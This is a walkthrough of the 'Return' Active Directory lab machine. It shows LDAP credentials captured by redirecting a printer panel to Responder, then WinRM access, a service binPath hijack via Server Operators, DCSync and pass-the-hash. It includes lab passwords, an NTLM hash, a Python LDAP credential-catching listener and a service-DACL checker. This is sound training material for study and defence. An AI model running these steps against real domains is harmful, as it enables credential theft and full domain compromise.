Overview
Return is an Active Directory machine that demonstrates how a misconfigured printer administration panel can expose stored LDAP credentials, leading to WinRM access and eventual domain compromise through Server Operators group abuse.
Attack Chain
- Enumerate exposed Active Directory services
- Identify the return.local domain through LDAP
- Discover a printer administration panel on HTTP
- Modify the LDAP server setting to point to the attacking machine
- Capture cleartext credentials with Responder
- Validate svc-printer credentials and gain WinRM access
- Enumerate group membership and identify Server Operators
- Abuse service control permissions to add svc-printer to local Administrators
- Perform DCSync with impacket-secretsdump
- Authenticate as Administrator using pass-the-hash
Enumeration
Port Scanning
We start by defining the target and running a full TCP port scan to identify exposed services.
export IP=10.129.51.160; export NAME=RETURN; echo $IP; echo $NAME; ping $IP -c 1
nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME
ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports
nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v
The open TCP ports are:
53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,59260

Findings
The scan results show a typical Active Directory attack surface. DNS (53), Kerberos (88), RPC (135), SMB (139, 445), LDAP (389, 636) and the Global Catalog ports 3268 and 3269 are exposed, together with Kerberos password change (464), RPC over HTTP (593) and Active Directory Web Services (9389). WinRM over HTTPS is also listed on 5986, which becomes useful once valid credentials are found. Note that the port list above does not include the HTTP service hosting the printer administration panel that the next section enumerates, although the foothold depends on it.
LDAP Enumeration
To confirm the domain name, we query LDAP for the base naming contexts.
ldapsearch -H ldap://$IP -x -s base namingcontexts
The LDAP response identifies the domain as return.local, so we add it to /etc/hosts for proper name resolution.
echo "$IP return.local" | sudo tee -a /etc/hosts

Web Enumeration
Printer Administration Panel
Browsing to the web service reveals a static printer administration panel.

The settings page is more interesting. It contains printer configuration values and exposes a username, svc-printer, in the LDAP configuration.

Because the page allows the LDAP server value to be updated, we can point it at our attacking machine and watch whether the application tries to authenticate. If the panel performs a simple bind with the stored svc-printer password, that password is sent in cleartext over TCP 389 to whatever host we supply, since the panel uses plain LDAP rather than LDAPS.
Foothold
Capturing LDAP Credentials
We start Responder in analysis mode (-A), which brings up its rogue servers, including the LDAP listener on port 389, without poisoning name resolution, and wait for the incoming bind.
sudo responder -I tun0 -A
Next, we update the printer settings so that the LDAP server points to our attacking machine.

The target connects back and sends the stored credentials in cleartext.

The captured credentials are:
svc-printer:1edFg43012!!
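To make concrete what Responder captured here, the following is an added example (not part of the original write-up, and not Responder's code): a minimal LDAP simple-bind catcher that parses the BER-encoded BindRequest a client sends, pulls out the bind DN and password, and answers with an invalidCredentials BindResponse so the client learns nothing. The sample message bytes are constructed in the script from the credentials shown above, not taken from a packet capture; the listener function only runs when the script is executed directly and needs to bind TCP 389.

```python
"""Minimal LDAP simple-bind catcher (added example, not from the original write-up).

Shows what is on the wire when the printer panel is pointed at an attacker
host and performs an LDAPv3 simple bind (RFC 4511 BindRequest, BER-encoded):
the bind DN and the password travel as plain OCTET STRINGs.
"""
import socket
from typing import Optional, Tuple


def _read_tlv(buf: bytes, off: int) -> Tuple[int, bytes, int]:
    """Read one BER tag-length-value at buf[off]; return (tag, value, next offset)."""
    tag = buf[off]
    length = buf[off + 1]
    off += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    return tag, buf[off:off + length], off + length


def _encode_tlv(tag: int, value: bytes) -> bytes:
    """BER-encode one TLV, using the long length form when needed."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def encode_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """Build the LDAPMessage a client sends for a simple bind (message_id < 128 assumed)."""
    body = (_encode_tlv(0x02, bytes([3]))             # version INTEGER 3
            + _encode_tlv(0x04, dn.encode())          # name LDAPDN (OCTET STRING)
            + _encode_tlv(0x80, password.encode()))   # authentication: simple [0]
    bind = _encode_tlv(0x60, body)                    # [APPLICATION 0] BindRequest
    return _encode_tlv(0x30, _encode_tlv(0x02, bytes([message_id])) + bind)


def parse_simple_bind(data: bytes) -> Optional[Tuple[int, str, str]]:
    """Return (messageID, bindDN, password) for a simple BindRequest, else None."""
    try:
        tag, msg, _ = _read_tlv(data, 0)
        if tag != 0x30:                               # not an LDAPMessage SEQUENCE
            return None
        tag, mid, off = _read_tlv(msg, 0)
        if tag != 0x02:
            return None
        tag, bind, _ = _read_tlv(msg, off)
        if tag != 0x60:                               # some other protocolOp (search, unbind, ...)
            return None
        tag, _version, off = _read_tlv(bind, 0)
        tag, name, off = _read_tlv(bind, off)
        tag, auth, _ = _read_tlv(bind, off)
    except IndexError:                                # truncated PDU
        return None
    if tag != 0x80:                                   # 0xA3 = SASL: no cleartext password here
        return None
    return (int.from_bytes(mid, "big"),
            name.decode("utf-8", "replace"),
            auth.decode("utf-8", "replace"))


def bind_response(message_id: int, result_code: int = 49) -> bytes:
    """BindResponse [APPLICATION 1]; 49 = invalidCredentials, matchedDN and message empty."""
    result = (_encode_tlv(0x0A, bytes([result_code]))  # resultCode ENUMERATED
              + _encode_tlv(0x04, b"") + _encode_tlv(0x04, b""))
    return _encode_tlv(0x30, _encode_tlv(0x02, bytes([message_id])) + _encode_tlv(0x61, result))


def listen_once(host: str = "0.0.0.0", port: int = 389) -> Optional[Tuple[int, str, str]]:
    """Accept one client, parse its first PDU, answer with a BindResponse, return the creds."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _peer = srv.accept()
        with conn:
            creds = parse_simple_bind(conn.recv(4096))
            if creds:
                conn.sendall(bind_response(creds[0]))
            return creds


# Constructed sample (not a capture): the bind the panel would send with the values above.
SAMPLE_BIND = encode_simple_bind(1, "return\\svc-printer", "1edFg43012!!")

if __name__ == "__main__":
    print(parse_simple_bind(SAMPLE_BIND))
    print(listen_once())                 # needs root or CAP_NET_BIND_SERVICE for port 389
```

A SASL bind (choice tag 0xA3) would carry no cleartext password, which is why the panel's use of a simple bind over unencrypted LDAP to an attacker-chosen server is the root problem here.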
Validating Access
With credentials for svc-printer, we first check whether the account has access to any useful SMB shares.
nxc smb $IP -u 'svc-printer' -p '1edFg43012!!' --shares

Nothing immediately stands out over SMB, so we test for WinRM access.
nxc winrm $IP -u 'svc-printer' -p '1edFg43012!!'

WinRM access is allowed, so we establish an interactive shell with evil-winrm. Without -S, evil-winrm uses the plain HTTP listener on 5985; if only the HTTPS listener on 5986 is reachable, add -S.
evil-winrm -i $IP -u 'svc-printer' -p '1edFg43012!!'
This gives us an interactive shell as svc-printer.

The user flag can now be read.
type C:\Users\svc-printer\Desktop\user.txt

Privilege Escalation
User & Group Enumeration
After gaining access as svc-printer, we query the domain account to review its group membership.
net user svc-printer /domain

The account is a member of both Print Operators and Server Operators. Server Operators is the key group here: on a domain controller its members can start, stop and reconfigure services, which is enough to run an arbitrary command as SYSTEM.
We also review the assigned privileges and see that SeBackupPrivilege and SeRestorePrivilege are enabled. SeBackupPrivilege would offer an alternative route (copying the NTDS.dit and SYSTEM hive off the DC for offline extraction), but in this path the important takeaway is service control: we can change a service's binary path and have the Service Control Manager execute a command of our choosing with the service's privileges.
Service Abuse
We list available services from the evil-winrm session.
services
The VMTools service is selected as the target because it runs as LocalSystem, so whatever binPath it is given executes as SYSTEM when the service starts. Before changing anything, note the service's current binary path so it can be restored afterwards.
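Before reconfiguring a service it is worth confirming the rights on its DACL rather than trusting group membership alone. The following is an added example, not from the original write-up: a parser for the SDDL string that sc sdshow <service> prints, which reports the service rights a set of principals holds and whether CHANGE_CONFIG plus START and STOP (or WRITE_DAC, which lets you grant yourself the rest) are among them. The SDDL embedded below is constructed to show the shape of such output and is not the actual descriptor from this machine; paste the real sc sdshow output in its place.

```python
"""Which service rights does an `sc sdshow` DACL grant? (added example, not the write-up's code)"""
import re
from typing import Iterable, Set

# Service-specific two-letter access strings from the SDDL specification.
RIGHTS = {
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
    "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
    "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL",
}
# SDDL aliases for well-known principals that show up in service DACLs.
ALIASES = {"SY": "SYSTEM", "BA": "Administrators", "SO": "Server Operators",
           "PO": "Print Operators", "IU": "INTERACTIVE", "SU": "SERVICE",
           "AU": "Authenticated Users", "WD": "Everyone", "BU": "Users"}
# Enough to swap binPath and bounce the service.
HIJACK_NEEDS = {"CHANGE_CONFIG", "START", "STOP"}

# (type;flags;rights;object_guid;inherit_object_guid;sid) - GUID fields are empty for services.
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[^;]*);(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]+)\)")

# Constructed sample, not this machine's descriptor: a DC-style DACL where Server Operators
# hold change-config plus start/stop, and a SACL that the parser must ignore.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)"
               "(A;;CCLCSWLOCRRC;;;SU)"
               "(A;;CCDCLCSWRPWPDTLOCRRC;;;SO)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def expand(rights: str) -> Set[str]:
    """Split a rights string into two-letter codes and name them; GA implies everything."""
    names = {RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)}
    if "GENERIC_ALL" in names:
        names |= set(RIGHTS.values())
    return names


def effective_rights(sddl: str, principals: Iterable[str]) -> Set[str]:
    """Rights the given principals (aliases or names) hold on the service, minus deny ACEs."""
    if "D:" not in sddl:
        return set()
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]        # DACL only, drop the SACL
    wanted = {ALIASES.get(p, p) for p in principals}
    allowed: Set[str] = set()
    denied: Set[str] = set()
    for ace in ACE_RE.finditer(dacl):
        who = ALIASES.get(ace["sid"], ace["sid"])
        if who not in wanted:
            continue
        target = denied if ace["type"] == "D" else allowed
        target |= expand(ace["rights"])
    return allowed - denied


def hijackable(sddl: str, principals: Iterable[str]) -> bool:
    """True when binPath can be changed and the service restarted (or the DACL rewritten)."""
    rights = effective_rights(sddl, principals)
    return HIJACK_NEEDS <= rights or "WRITE_DAC" in rights


if __name__ == "__main__":
    mine = ["SO", "PO", "AU"]                 # groups svc-printer is in, per net user
    print(sorted(effective_rights(SAMPLE_SDDL, mine)))
    print("hijackable:", hijackable(SAMPLE_SDDL, mine))
```

The check is deliberately simple about ACE ordering: any matching deny removes the right regardless of position, which is the conservative reading before you touch a service on a domain controller.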

Instead of using a reverse shell payload, we modify the VMTools service binary path so that it adds svc-printer to the local Administrators group when the service starts.
cmd /c 'sc config VMTools binPath= "cmd /c net localgroup Administrators svc-printer /add"'

We stop the service.
cmd /c "sc stop VMTools"

Then start it again to trigger the modified command. Because cmd.exe never reports to the Service Control Manager as a service, sc start returns an error saying the service did not respond in a timely fashion; the command has already run by then.
cmd /c "sc start VMTools"

To confirm the attack worked, we check the local Administrators group.
net localgroup Administrators
svc-printer is now a member of the local Administrators group. The new membership only appears in access tokens created after the change, so the existing evil-winrm session does not gain administrative rights; any fresh logon, such as the secretsdump connection below, does.

DCSync
With svc-printer in Administrators on the domain controller (on a DC this is the domain's built-in Administrators group, which holds the directory replication rights DCSync relies on), we can perform a DCSync attack from the attacking machine using impacket-secretsdump.
impacket-secretsdump -outputfile creds/return.hashes -just-dc return.local/svc-printer:'1edFg43012!!'@$IP
The dump returns the Administrator hash.

We verify the hash with netexec.
nxc winrm $IP -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460'
The hash is valid for WinRM authentication.

Administrator Access
With the hash confirmed, we authenticate with evil-winrm using pass-the-hash.
evil-winrm -i $IP -u 'Administrator' -H '32db622ed9c00dd1039d8288b0407460'

The root flag can now be read.
type C:\Users\Administrator\Desktop\root.txt

Key Takeaways
Return shows how a seemingly simple printer configuration page can expose highly sensitive credentials. By redirecting the panel's LDAP authentication to an attacker-controlled host, the stored service password was captured in cleartext, because the application performed a simple bind over unencrypted LDAP to a server address that could be changed from the web panel, and the password was then reused for WinRM access. The final escalation came from Server Operators membership, where service control rights let the compromised account run a command as SYSTEM, join the local Administrators group on the domain controller and perform DCSync for full domain compromise. Defensively, a service account whose password is stored in a device or web panel should never sit in Server Operators or Print Operators on a domain controller, LDAP settings on such panels should require LDAPS and not be freely editable, and a writable service configuration on a domain controller should be treated as a domain-admin equivalent.